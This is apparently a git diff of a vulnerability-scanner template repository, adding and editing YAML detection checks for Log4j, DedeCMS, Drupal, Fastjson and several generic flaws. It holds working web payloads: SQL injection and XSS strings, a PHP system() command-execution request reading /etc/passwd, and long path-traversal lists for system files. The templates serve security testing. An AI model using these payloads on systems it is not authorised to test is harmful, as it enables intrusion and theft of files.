+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/cisco/cucm-username-enumeration.yaml b/vulnerabilities/cisco/cucm-username-enumeration.yaml
index 3665cb9687..4f310fe717 100644
--- a/vulnerabilities/cisco/cucm-username-enumeration.yaml
+++ b/vulnerabilities/cisco/cucm-username-enumeration.yaml
@@ -28,7 +28,6 @@ requests:
         condition: and
 
       - type: dsl
-        part: header
         dsl:
           - contains(tolower(content_type), 'application/xml')
           - contains(tolower(content_type), 'text/xml')
diff --git a/vulnerabilities/code42/code42-log4j-rce.yaml b/vulnerabilities/code42/code42-log4j-rce.yaml
index 8e978f12ae..6e1c212fed 100644
--- a/vulnerabilities/code42/code42-log4j-rce.yaml
+++ b/vulnerabilities/code42/code42-log4j-rce.yaml
@@ -1,14 +1,24 @@
 id: code42-log4j-rce
 
 info:
-  name: Log4j Code42 RCE
+  name: Apache Code42 -  Log4j Remote Code Execution
   author: Adam Crosser
   severity: critical
-  description: Remote code execution via log4j vulnerability
+  description: |
+    Multiple Code42 components are impacted by the logj4 vulnerability. Affected Code42 components include:
+    - Code42 cloud: Updated Log4j from 2.15.0 to 2.17.1 on January 26, 2022
+    - Code42 app for Incydr Basic and Advanced and CrashPlan Cloud product plans: Updated Log4j from 2.16.0 to 2.17.1 on January 18, 2022
+    - Code42 User Directory Sync (UDS): Updated Log4j from 2.15.0 to 2.17.1 on February 2, 2022
+    - On-premises Code42 server: Mitigated from Log4j vulnerabilities by following these steps
+    - On-premises Code42 app: Updated to Log4j 2.16 on December 17, 2021
   reference:
     - https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   classification:
-    cve-id: CVE-2021-44228
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: jndi,log4j,rce,cve,cve2021,oast,code42
 
 requests:
@@ -34,3 +44,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/concrete/concrete-xss.yaml
similarity index 81%
rename from vulnerabilities/other/concrete-xss.yaml
rename to vulnerabilities/concrete/concrete-xss.yaml
index b7833ae72e..a853d9d66f 100644
--- a/vulnerabilities/other/concrete-xss.yaml
+++ b/vulnerabilities/concrete/concrete-xss.yaml
@@ -1,15 +1,15 @@
 id: concrete-xss
 
 info:
-  name: Unauthenticated reflected XSS in preview_as_user function
-  author: shifacyclewla,hackergautam
+  name: Concrete - Unauthenticated Reflected XSS in preview_as_user function
+  author: shifacyclewla,hackergautam,djoevanka
   severity: medium
   description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
   reference:
     - https://hackerone.com/reports/643442
     - https://github.com/concrete5/concrete5/pull/7999
     - https://twitter.com/JacksonHHax/status/1389222207805661187
-  tags: concrete,xss,cms
+  tags: hackerone,concrete,xss,cms,unauth
 
 requests:
   - method: GET
@@ -32,4 +32,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
similarity index 100%
rename from vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
rename to vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
diff --git a/vulnerabilities/dedecms/dedecms-config-xss.yaml b/vulnerabilities/dedecms/dedecms-config-xss.yaml
new file mode 100644
index 0000000000..59f32da943
--- /dev/null
+++ b/vulnerabilities/dedecms/dedecms-config-xss.yaml
@@ -0,0 +1,37 @@
+id: dedecms-config-xss
+
+info:
+  name: DedeCMS V5.7 config.php Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
+  reference:
+    - https://www.zilyun.com/8665.html
+    - https://www.60ru.com/161.html
+    - https://www.cnblogs.com/milantgh/p/3615853.html
+  metadata:
+    verified: true
+    shodan-query: http.html:"DedeCms"
+  tags: dedecms,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "location='../../</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
similarity index 77%
rename from vulnerabilities/other/dedecms-membergroup-sqli.yaml
rename to vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
index 6ab43810d6..8d1d63d199 100644
--- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml
+++ b/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
@@ -7,19 +7,24 @@ info:
   description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
   reference:
     - http://www.dedeyuan.com/xueyuan/wenti/1244.html
+  metadata:
+    shodan-query: http.html:"DedeCms"
   tags: sqli,dedecms
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
+      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - "52c69e3a57331081823331c4e69d3f2e"
+          - '{{md5({{num}})}}'
         part: body
 
       - type: status
diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/dedecms/dedecms-openredirect.yaml
similarity index 79%
rename from vulnerabilities/other/dedecms-openredirect.yaml
rename to vulnerabilities/dedecms/dedecms-openredirect.yaml
index 689d98efa2..f240d95c4d 100644
--- a/vulnerabilities/other/dedecms-openredirect.yaml
+++ b/vulnerabilities/dedecms/dedecms-openredirect.yaml
@@ -14,13 +14,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
+      - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "Location: https://evil.com"
+          - "Location: https://interact.sh"
         part: header
 
       - type: status
diff --git a/vulnerabilities/dedecms/dedecms-rce.yaml b/vulnerabilities/dedecms/dedecms-rce.yaml
new file mode 100644
index 0000000000..5a6860a55f
--- /dev/null
+++ b/vulnerabilities/dedecms/dedecms-rce.yaml
@@ -0,0 +1,32 @@
+id: dedecms-rce
+
+info:
+  name: DedeCMS v5.8.1-beta - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The vulnerability is due to a variable override vulnerability in DedeCMS that allows an attacker to construct malicious code with template file inclusion without authorization to cause remote command execution attacks and ultimately gain the highest privileges on the server.
+  reference:
+    - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
+    - https://sectime.top/post/1d114771.html
+  metadata:
+    verified: true
+    fofa-query: app="DedeCMS"
+  tags: dedecms,cms,rce
+
+requests:
+  - raw:
+      - |
+        GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Referer: <?php "system"($c);die;/*ref
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/drupal/drupal-avatar-xss.yaml b/vulnerabilities/drupal/drupal-avatar-xss.yaml
new file mode 100644
index 0000000000..a61b33b016
--- /dev/null
+++ b/vulnerabilities/drupal/drupal-avatar-xss.yaml
@@ -0,0 +1,33 @@
+id: drupal-avatar-xss
+
+info:
+  name: Drupal avatar_uploader v7.x-1.0-beta8 - Cross-Site Scripting
+  author: bywalks
+  severity: medium
+  description: |
+    This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+  reference:
+    - https://www.exploit-db.com/exploits/50841
+  tags: xss,drupal,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<div><script>alert(document.domain)</script></div>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml
index 9a4ba92243..a7d06b2a33 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml
@@ -1,14 +1,19 @@
 id: fastjson-1-2-24-rce
 
 info:
-  name: Fastjson 1.2.24 Deserialization RCE
+  name: Fastjson 1.2.24 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
     - https://www.freebuf.com/vuls/208339.html
     - https://github.com/wyzxxz/fastjson_rce_tool
-  tags: fastjson,rce,deserialization,oast
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: fastjson,rce,deserialization,oast,vulhub
 
 requests:
   - raw:
@@ -48,4 +53,6 @@ requests:
         condition: and
         words:
           - "Internal Server Error"
-          - "500"
\ No newline at end of file
+          - "500"
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml
index 3564ca14eb..6dec46c05e 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml
@@ -1,12 +1,17 @@
 id: fastjson-1-2-41-rce
 
 info:
-  name: Fastjson 1.2.41 Deserialization RCE
+  name: Fastjson 1.2.41 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.41 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -32,4 +37,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml
index 6ea56f483d..7bd98233dd 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml
@@ -1,12 +1,17 @@
 id: fastjson-1-2-42-rce
 
 info:
-  name: Fastjson 1.2.42 Deserialization RCE
+  name: Fastjson 1.2.42 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -32,4 +37,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml
index 4a30340ea2..d2e5c7f82d 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml
@@ -1,12 +1,17 @@
 id: fastjson-1-2-43-rce
 
 info:
-  name: Fastjson 1.2.43 Deserialization RCE
+  name: Fastjson 1.2.43 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.43 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -32,4 +37,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml
index 3336b0ec72..baffecd9c4 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml
@@ -1,15 +1,20 @@
 id: fastjson-1-2-47-rce
 
 info:
-  name: Fastjson 1.2.47 Deserialization RCE
+  name: Fastjson 1.2.47 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
     - https://www.freebuf.com/vuls/208339.html
     - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
     - https://github.com/wyzxxz/fastjson_rce_tool
-  tags: fastjson,rce,deserialization,oast
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,deserialization,oast,vulhub,fastjson
 
 requests:
   - raw:
@@ -41,4 +46,6 @@ requests:
         condition: and
         words:
           - "Bad Request"
-          - "400"
\ No newline at end of file
+          - "400"
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml
index 7f16ccb998..eace2468e2 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml
@@ -1,12 +1,17 @@
 id: fastjson-1-2-62-rce
 
 info:
-  name: Fastjson 1.2.62 Deserialization RCE
+  name: Fastjson 1.2.62 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -31,4 +36,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml
index 0720680d36..c23c812aad 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml
@@ -1,12 +1,17 @@
 id: fastjson-1-2-67-rce
 
 info:
-  name: Fastjson 1.2.67 Deserialization RCE
+  name: Fastjson 1.2.67 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -34,4 +39,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml
index 0779215459..bcbb4282fe 100644
--- a/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml
@@ -1,12 +1,18 @@
 id: fastjson-1-2-68-rce
 
 info:
-  name: Fastjson 1.2.68 Deserialization RCE
+  name: Fastjson 1.2.68 - Remote Code Execution
   author: zh
   severity: critical
+  description: |
+    Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -52,4 +58,6 @@ requests:
       - type: status
         negative: true
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/25
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 1ac1d781c6..88f4e1af9f 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -2,7 +2,7 @@ id: cache-poisoning
 
 info:
   name: Cache Poisoning
-  author: melbadry9,xelkomy,akincibor
+  author: melbadry9,xelkomy,akincibor,dogasantos
   severity: low
   reference:
     - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
@@ -13,9 +13,9 @@ requests:
   - raw:
       - |
         GET /?{{randstr}}=9 HTTP/1.1
-        X-Forwarded-Prefix: cache.example.com
-        X-Forwarded-Host: cache.example.com
-        X-Forwarded-For: cache.example.com
+        X-Forwarded-Prefix: prefix.cache.interact.sh
+        X-Forwarded-Host: host.cache.interact.sh
+        X-Forwarded-For: for.cache.interact.sh
 
       - |
         GET /?{{randstr}}=9 HTTP/1.1
@@ -24,4 +24,10 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "cache.example.com")'
+          - 'contains(body_2, "cache.interact.sh")'
+
+    extractors:
+      - type: regex
+        part: response
+        regex:
+          - "(prefix|host|for).cache.interact.sh"
diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml
index 0c21683c10..ba439bb09a 100644
--- a/vulnerabilities/generic/cors-misconfig.yaml
+++ b/vulnerabilities/generic/cors-misconfig.yaml
@@ -16,6 +16,10 @@ requests:
         GET / HTTP/1.1
         Host: {{Hostname}}
         Origin: {{cors_origin}}
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{cors_origin}}
 
     payloads:
       cors_origin:
@@ -37,4 +41,4 @@ requests:
         dsl:
           - "contains(tolower(all_headers), 'access-control-allow-origin: {{cors_origin}}')"
           - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
-        condition: and
\ No newline at end of file
+        condition: and
diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml
index 2fe6563ca0..4c0078ec88 100644
--- a/vulnerabilities/generic/crlf-injection.yaml
+++ b/vulnerabilities/generic/crlf-injection.yaml
@@ -1,10 +1,10 @@
 id: crlf-injection
 
 info:
-  name: CRLF injection
+  name: CRLF - Injection Detection
   author: melbadry9,nadino,xElkomy
   severity: low
-  description: Improper sanitization of CRLF sequences.
+  description: CRLF sequences were not properly sanitized.
   tags: crlf,generic
 
 requests:
@@ -25,3 +25,5 @@ requests:
         regex:
           - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
         part: header
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/generic/generic-j2ee-lfi.yaml b/vulnerabilities/generic/generic-j2ee-lfi.yaml
new file mode 100644
index 0000000000..d37c840343
--- /dev/null
+++ b/vulnerabilities/generic/generic-j2ee-lfi.yaml
@@ -0,0 +1,45 @@
+id: generic-j2ee-lfi
+
+info:
+  name: Generic J2EE LFI scan
+  author: davidfegyver
+  severity: high
+  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
+    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
+  metadata:
+    verified: true
+    shodan-query: http.title:"J2EE"
+  tags: lfi,generic,j2ee
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/WEB-INF/web.xml"
+      - "{{BaseURL}}/.//WEB-INF/web.xml"
+      - "{{BaseURL}}/../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<servlet-name>"
+          - "</web-app>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/generic/generic-linux-lfi.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml
index a1860993d6..e028f11a9e 100644
--- a/vulnerabilities/generic/generic-linux-lfi.yaml
+++ b/vulnerabilities/generic/generic-linux-lfi.yaml
@@ -1,10 +1,15 @@
 id: generic-linux-lfi
 
 info:
-  name: Generic Linux based LFI Test
-  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley
+  name: Generic Linux - Local File Inclusion
+  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
   severity: high
-  description: Searches for /etc/passwd on passed URLs
+  description: Generic Linux is subject to local file Inclusion on searches for /etc/passwd on passed URLs.
+  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: linux,lfi,generic
 
 requests:
@@ -33,6 +38,15 @@ requests:
       - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
       - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
       - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/..///////..////..//////etc/passwd"
+      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
+      - "{{BaseURL}}/index.php?page=etc/passwd"
+      - "{{BaseURL}}/index.php?page=etc/passwd%00"
+      - "{{BaseURL}}/index.php?page=../../etc/passwd"
+      - "{{BaseURL}}/index.php?page=....//....//etc/passwd"
+      - "{{BaseURL}}/../../../../../../../../../etc/passwd"
 
     stop-at-first-match: true
     matchers:
@@ -40,3 +54,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/generic/generic-windows-lfi.yaml b/vulnerabilities/generic/generic-windows-lfi.yaml
index 5297d77088..9e5ad66a36 100644
--- a/vulnerabilities/generic/generic-windows-lfi.yaml
+++ b/vulnerabilities/generic/generic-windows-lfi.yaml
@@ -1,10 +1,15 @@
 id: generic-windows-lfi
 
 info:
-  name: Generic Windows based LFI Test
-  author: mesaglio,sushantkamble
+  name: Windows - Local File Inclusion
+  author: mesaglio,sushantkamble,ritikchaddha
   severity: high
-  description: Searches for /windows/win.ini on passed URLs
+  description: |
+    Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: azure,windows,lfi,generic
 
 requests:
@@ -20,13 +25,27 @@ requests:
       - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
       - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
       - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/..///////..////..//////windows/win.ini"
+      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
+      - "{{BaseURL}}/index.php?page=windows/win.ini"
+      - "{{BaseURL}}/index.php?page=windows/win.ini%00"
+      - "{{BaseURL}}/index.php?page=../../windows/win.ini"
+      - "{{BaseURL}}/index.php?page=....//....//windows/win.ini"
+      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
+      - "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
+      - "{{BaseURL}}/../../../../../../../../../windows/win.ini"
+      - "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
 
     stop-at-first-match: true
     matchers:
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml
index 2598c937eb..9882c469e4 100644
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@@ -15,94 +15,95 @@ requests:
 
     payloads:
       redirect:
-        - '%0a/example.com/'
-        - '%0d/example.com/'
-        - '%00/example.com/'
-        - '%09/example.com/'
-        - '%5C%5Cexample.com/%252e%252e%252f'
-        - '%5Cexample.com'
-        - '%5cexample.com/%2f%2e%2e'
-        - '%5c{{RootURL}}example.com/%2f%2e%2e'
-        - '../example.com'
-        - '.example.com'
-        - '/%5cexample.com'
-        - '////\;@example.com'
-        - '////example.com'
-        - '///example.com'
-        - '///example.com/%2f%2e%2e'
-        - '///example.com@//'
